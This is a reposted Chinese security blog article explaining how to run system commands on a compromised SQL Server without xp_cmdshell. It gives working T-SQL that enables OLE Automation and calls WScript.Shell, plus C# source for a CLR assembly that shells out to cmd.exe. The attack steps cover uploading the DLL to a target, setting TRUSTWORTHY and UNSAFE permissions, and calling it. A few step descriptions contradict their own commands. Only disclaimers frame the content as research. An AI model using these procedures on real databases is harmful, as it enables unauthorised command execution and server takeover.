SQL Serve无xp_cmdshellg下的命令执行姿势

admin
admin
admin
138858
文章
114
评论
2021年6月15日01:07:47评论97 views字数 2142阅读7分8秒阅读模式

文章来源:https://422926799.github.io/posts/639a5410.html

利用COM执行命令

需要开启Ole Automation Procedures组件

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
exec sp_oamethod @luan,'exec',@exec output,'C:\Windows\System32\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out;
select @str;

SQL Serve无xp_cmdshellg下的命令执行姿势

没有开启Ole Automation Procedures,可以用下面的命令开启

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

编写CLR实现执行命令

编写语言:C#
Vs创建类库

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System;
using System.Threading.Tasks;

namespace shellexec
{
    public class exec
    {
        public static string cmd(string command)
        {
            System.Diagnostics.Process pro = new System.Diagnostics.Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;
            pro.StartInfo.RedirectStandardError = true; //标准错误
            pro.StartInfo.RedirectStandardInput = true; //标准输入
            pro.StartInfo.RedirectStandardOutput = true; //标准输出
            pro.StartInfo.CreateNoWindow = true; //是否在新窗口开启进程
            pro.Start();
            pro.StandardInput.WriteLine(command + "&&exit"); //命令参数写入
            pro.StandardInput.AutoFlush = true; //缓冲区自动刷新
            string output = pro.StandardOutput.ReadToEnd(); //读取执行结果
            pro.WaitForExit(); //等待执行完成退出
            pro.Close();
            return output.ToString();
        }
    }
}

生成dll后,可以用hex的方法写到目标,或者shell上传。然后开始构造
1.目标数据库实例需要启用clr集成

exec sp_configure 'clr enabled', 1;--在SQL Server中启用CLR
reconfigure;
go

2.目标数据库的可信任属性需要设为false,可以使用以下语句启用

ALTER DATABASE [<数据库名称>] SET TRUSTWORTHY ON

3.在数据库中注册DLL

CREATE ASSEMBLY MySqlCLR FROM '<dll的路径>' //MySqlCLR为导入dll后的变量名称

4.创建函数
(根据对应函数的类型的参数构造对应的参数类型,然后RETURNS [nvarchar] (max)记得设置为返回最大如果是返回string类型的话),在直接这个dll的名称在那个命名空间、类、函数)

CREATE FUNCTION [dbo].[cmd2]  
(  
    @cmd AS NVARCHAR(max)
)  
RETURNS [nvarchar] (max) WITH EXECUTE AS CALLER
AS  
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd //shellexec为命名空间,exec为类名,cmd为函数名
GO

5.程序集的权限级别必须设为 external access,否则在部署的时候会报错

ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE

6.调用存储过程和函数方法

select [dbo].[cmd2]('whoami')


SQL Serve无xp_cmdshellg下的命令执行姿势

SQL Serve无xp_cmdshellg下的命令执行姿势

最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的



本文始发于微信公众号(无害实验室sec):SQL Serve无xp_cmdshellg下的命令执行姿势

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月15日01:07:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQL Serve无xp_cmdshellg下的命令执行姿势http://cn-sec.com/archives/398016.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息